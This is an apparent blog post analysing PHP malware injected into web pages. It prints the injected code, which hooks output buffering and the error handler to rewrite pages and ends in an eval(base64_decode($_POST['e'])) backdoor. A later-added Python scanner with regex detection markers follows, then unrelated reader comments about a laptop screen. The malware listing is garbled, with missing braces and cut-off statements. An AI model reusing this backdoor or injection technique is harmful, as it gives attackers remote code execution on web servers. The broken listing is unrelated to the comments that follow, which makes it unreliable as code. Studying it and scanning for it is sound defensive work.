Thursday, October 15, 2009

PHP Code Analysis of Bagle Virus

The code

The following is the code that is executed on all pages infected by this virus:

if (!isset ($b0sr1))
function b0sr ($s)
if (preg_match_all ('#<script(.*?)</script>#is', $s, $a))
foreach ($a[0] as $v)
if (count (explode ("\n", $v)) > 5)
$e = preg_match ('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v)
|| preg_match ('#[\(\[](\s*\d+,){20,}#', $v);
if ((preg_match ('#\beval\b#', $v)
&& ($e || strpos ($v, 'fromCharCode'))) || ($e
&& strpos ($v,
$s = str_replace ($v, '', $s);
if (preg_match_all
('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is', $s, $a))
foreach ($a[0] as $v)
if (preg_match
('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i', $v)
&& !strstr ($v, '?'.'>'))
$s = preg_replace ('#'.preg_quote ($v, '#').'.*?</iframe>#is', '', $s);
$s = str_replace ($a =
'', $s);
if (stristr ($s, '<body'))
$s = preg_replace ('#(\s*<body)#mi', $a.'\1', $s);
elseif (strpos ($s, ',a')) $s .= $a;
return $s;
function b0sr2 ($a, $b, $c, $d)
global $b0sr1;
$s = array ();
if (function_exists ($b0sr1))
call_user_func ($b0sr1, $a, $b, $c, $d);
foreach (@ob_get_status (1) as $v)
if (($a = $v['name']) == 'b0sr')
elseif ($a == 'ob_gzhandler') break;
$s[] = array ($a == 'default output handler' ? false : $a);

for ($i = count ($s) - 1; $i >= 0; $i--)
$s[$i][1] = ob_get_contents ();
ob_end_clean ();
ob_start ('b0sr');

for ($i = 0; $i < count ($s); $i++)
ob_start ($s[$i][0]);
echo $s[$i][1];
$b0sr1 = (($a = @set_error_handler ('b0sr2')) != 'b0sr2') ? $a : 0;
eval (base64_decode ($_POST['e']));
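
For cleanup, the strings in the listing above can be used to locate affected files. The following Python scanner is an added example, not part of the original post; the marker names, the verdict thresholds and the sample strings are assumptions made for illustration, and the patterns are taken only from the code shown on this page.

```python
import os
import re

# Markers copied from the listing on this page. Treating them as reliable
# indicators of this injection is an assumption of this example.
MARKERS = {
    "post_eval_backdoor": re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_POST\s*\[", re.I),
    "output_filter_hook": re.compile(r"ob_start\s*\(\s*['\"]b0sr['\"]", re.I),
    "error_handler_hook": re.compile(r"set_error_handler\s*\(\s*['\"]b0sr2['\"]", re.I),
    "guard_variable": re.compile(r"isset\s*\(\s*\$b0sr1\b"),
}

def scan_source(text):
    """Return {marker name: [1-based line numbers]} for markers found in text."""
    hits = {}
    for name, rx in MARKERS.items():
        # Match on the whole text so a call split across lines is still found.
        lines = [text.count("\n", 0, m.start()) + 1 for m in rx.finditer(text)]
        if lines:
            hits[name] = lines
    return hits

def verdict(hits):
    """Classify a file: the POST eval alone, or any two markers, means infected."""
    if "post_eval_backdoor" in hits or len(hits) >= 2:
        return "infected"
    return "suspicious" if hits else "clean"

def scan_tree(root):
    """Yield (path, verdict, hits) for every .php file under root with hits."""
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(".php"):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    yield path, verdict(hits), hits

# Constructed samples (not real site files).
CLEAN_SAMPLE = "<?php\nob_start('ob_gzhandler');\necho 'hello';\n"
INFECTED_SAMPLE = (
    "<?php if (!isset ($b0sr1)) {\n"
    "ob_start ('b0sr');\n"
    "$b0sr1 = (($a = @set_error_handler ('b0sr2')) != 'b0sr2') ? $a : 0;\n"
    "eval (base64_decode ($_POST['e']));\n"
    "} ?>\n<html><body>page</body></html>\n"
)
```

Running `scan_tree` over a web root lists each `.php` file containing a marker together with the line numbers to inspect; a copy that has been re-encoded or renamed will not match these literal patterns.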


bird on the tide said...

I'm not sure if you would be able to help with this, but you seem very knowledgeable about computers. I own a second hand Dell laptop. Two weeks ago part of the screen became faded. Then last week the whole screen was so faded you could barely make out the screen, however you can make out part of the screen. I tried to hook up my screen to my TV as an alternative monitor, however it wasn't working. I tried to change the appearance settings, thinking I need to change something to make the output change for the TV, and in doing this, after I restarted the computer everything was back to normal. And yet the next day when I went to use my computer it had happened again. I have repeated the same steps I previously did and it didn't work. Then all of a sudden it worked. I am becoming increasingly frustrated with this and was hoping you could offer any suggestions you had. Is it a virus? Is it a setting I need to reset?
Thank you!

Arun Prabhakar said...

This can be due to backlight problems in your LCD.
When you connect your laptop to the TV you will need to change the display configuration. There are usually buttons on the keyboard to switch screens; it depends on the laptop and maker.
Please provide a little more detail about your laptop. Let me see if I can help you more.

bird on the tide said...

It is a Dell Inspiron e1045. I don't believe it is the light because there are times when it flashes and the image is perfect, usually at the start of me booting up.

Arun Prabhakar said...

It can be contact problems between the screen and the motherboard.

Did connecting to the TV work?

bird on the tide said...

No, when I connected to multiple different TV screens/monitors no image came up.